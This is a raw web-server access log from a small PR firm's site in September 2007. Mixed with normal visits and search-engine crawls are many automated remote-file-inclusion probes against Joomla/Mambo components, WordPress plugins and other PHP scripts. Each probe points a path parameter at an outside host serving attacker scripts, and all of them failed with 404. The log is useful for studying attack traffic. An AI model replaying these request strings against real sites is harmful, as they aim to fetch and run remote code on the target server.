75.55.89.174 - - [12/Sep/2007:05:57:04 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:04 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:05 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:05 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
75.55.89.174 - - [12/Sep/2007:05:57:05 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)" "www.projectpr.com"
66.249.67.53 - - [12/Sep/2007:06:04:36 -0700] "GET /aboutus.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
72.232.3.202 - - [12/Sep/2007:07:00:49 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [12/Sep/2007:07:00:49 -0700] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [12/Sep/2007:07:00:49 -0700] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [12/Sep/2007:07:01:09 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [12/Sep/2007:07:01:09 -0700] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [12/Sep/2007:07:01:09 -0700] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:31 -0700] "GET / HTTP/1.1" 200 10036 "http://search.yahoo.com/search?p=Public+Relations+Techonology+Silicon+Valley&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:32 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
64.44.39.26 - - [12/Sep/2007:07:07:33 -0700] "GET /favicon.ico HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.projectpr.com"
212.241.214.57 - - [12/Sep/2007:07:26:50 -0700] "GET /logs/access.log//login.php?dir=http://c-pw.ch/cms/upload/thumbs/140_666_SIMG6666.jpg.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.214.57 - - [12/Sep/2007:07:26:51 -0700] "GET //login.php?dir=http://c-pw.ch/cms/upload/thumbs/140_666_SIMG6666.jpg.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.214.57 - - [12/Sep/2007:07:26:51 -0700] "GET /logs//login.php?dir=http://c-pw.ch/cms/upload/thumbs/140_666_SIMG6666.jpg.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
66.230.196.5 - - [12/Sep/2007:07:32:01 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.808" "www.projectpr.com"
82.146.52.108 - - [12/Sep/2007:07:36:29 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
82.146.52.108 - - [12/Sep/2007:07:36:30 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
82.146.52.108 - - [12/Sep/2007:07:36:30 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.230.196.5 - - [12/Sep/2007:07:46:04 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.808" "www.projectpr.com"
66.230.196.5 - - [12/Sep/2007:07:46:04 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.35.191.105 - - [12/Sep/2007:08:14:07 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/ini?? HTTP/1.1" 404 298 "-" "libwww-perl/5.64" "www.projectpr.com"
209.35.191.105 - - [12/Sep/2007:08:14:08 -0700] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
195.199.227.210 - - [12/Sep/2007:08:22:11 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 297 "-" "libwww-perl/5.803" "www.projectpr.com"
195.199.227.210 - - [12/Sep/2007:08:22:11 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.6.28.140 - - [12/Sep/2007:08:46:41 -0700] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
195.199.227.210 - - [12/Sep/2007:08:50:48 -0700] "GET /logs/access.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.35.191.105 - - [12/Sep/2007:08:52:30 -0700] "GET /logs/access.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/ini?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
208.36.144.9 - - [12/Sep/2007:09:01:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.projectpr.com"
69.72.149.141 - - [12/Sep/2007:09:33:07 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.72.149.141 - - [12/Sep/2007:09:33:09 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.51.43.185 - - [12/Sep/2007:09:45:15 -0700] "GET / HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Mirar Search Indexing Agent see getmirar.com)" "www.projectpr.com"
216.169.147.177 - - [12/Sep/2007:10:23:21 -0700] "GET /logs/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.169.147.177 - - [12/Sep/2007:10:23:22 -0700] "GET /components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.200.91.130 - - [12/Sep/2007:10:30:07 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.200.91.130 - - [12/Sep/2007:10:31:09 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.200.91.130 - - [12/Sep/2007:10:31:10 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.169.147.177 - - [12/Sep/2007:10:31:40 -0700] "GET /logs/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.169.147.177 - - [12/Sep/2007:10:31:41 -0700] "GET /components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.218.133.171 - - [12/Sep/2007:10:35:05 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.myadultsshop.com/media/id.txt?? HTTP/1.1" 404 310 "-" "libwww-perl/5.803" "www.projectpr.com"
213.218.133.171 - - [12/Sep/2007:10:35:05 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.myadultsshop.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.53.79.146 - - [12/Sep/2007:10:36:48 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://darkness.ws/xpl/bot/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.79.146 - - [12/Sep/2007:10:36:48 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://darkness.ws/xpl/bot/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.193.242.218 - - [12/Sep/2007:10:38:08 -0700] "GET /logs/access.log//login.php?dir=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
62.193.242.218 - - [12/Sep/2007:10:38:08 -0700] "GET //login.php?dir=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
62.193.242.218 - - [12/Sep/2007:10:38:08 -0700] "GET /logs//login.php?dir=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.218.133.171 - - [12/Sep/2007:10:47:32 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.myadultsshop.com/media/id.txt?? HTTP/1.1" 404 321 "-" "libwww-perl/5.803" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:10:51:23 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
69.72.149.141 - - [12/Sep/2007:11:04:04 -0700] "GET /logs/access.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:11:16:44 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 310 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:11:16:45 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
68.142.212.219 - - [12/Sep/2007:11:23:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:11:37:17 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 268 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.213.12 - - [12/Sep/2007:11:46:48 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.213.12 - - [12/Sep/2007:11:46:48 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.213.12 - - [12/Sep/2007:11:46:48 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.183 - - [12/Sep/2007:11:51:52 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.19.120 - - [12/Sep/2007:11:55:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.26.120 - - [12/Sep/2007:11:55:39 -0700] "GET /clipart/ HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
216.32.66.74 - - [12/Sep/2007:11:59:05 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.32.66.74 - - [12/Sep/2007:11:59:05 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.32.66.74 - - [12/Sep/2007:11:59:05 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.64.132.254 - - [12/Sep/2007:12:00:57 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 311 "-" "libwww-perl/5.76" "www.projectpr.com"
83.64.132.254 - - [12/Sep/2007:12:00:57 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 295 "-" "libwww-perl/5.76" "www.projectpr.com"
83.64.132.254 - - [12/Sep/2007:12:00:57 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:12:03:47 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:12:03:48 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_phpshop&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.89.25.183 - - [12/Sep/2007:12:06:21 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.183 - - [12/Sep/2007:12:06:21 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.75.21.221 - - [12/Sep/2007:12:09:34 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 305 "-" "libwww-perl/5.803" "www.projectpr.com"
216.75.21.221 - - [12/Sep/2007:12:09:34 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
216.75.21.221 - - [12/Sep/2007:12:09:34 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.803" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:12:25:24 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_facileforms&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 268 "-" "libwww-perl/5.805" "www.projectpr.com"
69.89.25.180 - - [12/Sep/2007:12:33:34 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://yscfortworth.org/calendar/cache/figo.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.180 - - [12/Sep/2007:12:33:34 -0700] "GET /newspublish/include.php?path[docroot]=http://yscfortworth.org/calendar/cache/figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.67.53 - - [12/Sep/2007:12:33:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
66.249.67.53 - - [12/Sep/2007:12:33:52 -0700] "GET /clipart/lines/?M=A HTTP/1.1" 200 687 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
68.142.212.219 - - [12/Sep/2007:12:36:06 -0700] "GET /images/desk_aerial_view.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.projectpr.com"
69.89.25.180 - - [12/Sep/2007:12:41:52 -0700] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://yscfortworth.org/calendar/cache/figo.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.808" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:12:47:12 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_facileforms&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:12:47:12 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_facileforms&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [12/Sep/2007:12:57:42 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [12/Sep/2007:12:57:43 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
70.87.118.244 - - [12/Sep/2007:12:57:43 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://polosudnord.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:13:27:15 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_sitemap&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 268 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.60.74 - - [12/Sep/2007:13:27:23 -0700] "GET /logs/access.log//login.php?dir=http://ox1de.altervista.org/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.60.74 - - [12/Sep/2007:13:27:24 -0700] "GET //login.php?dir=http://ox1de.altervista.org/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.60.74 - - [12/Sep/2007:13:27:24 -0700] "GET /logs//login.php?dir=http://ox1de.altervista.org/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:14:01:58 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_sitemap&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
80.89.5.20 - - [12/Sep/2007:14:01:59 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_sitemap&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
24.97.145.206 - - [12/Sep/2007:14:05:40 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://yscfortworth.org/calendar/cache/figo.txt?? HTTP/1.1" 404 295 "-" "libwww-perl/5.805" "www.projectpr.com"
24.97.145.206 - - [12/Sep/2007:14:09:53 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://yscfortworth.org/calendar/cache/figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
24.97.145.206 - - [12/Sep/2007:14:09:55 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://yscfortworth.org/calendar/cache/figo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.84.217.242 - - [12/Sep/2007:14:19:23 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.afarhawaii.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
70.84.217.242 - - [12/Sep/2007:14:19:24 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.afarhawaii.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
70.84.217.242 - - [12/Sep/2007:14:19:24 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.afarhawaii.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
82.102.10.236 - - [12/Sep/2007:14:19:54 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
82.102.10.236 - - [12/Sep/2007:14:22:37 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
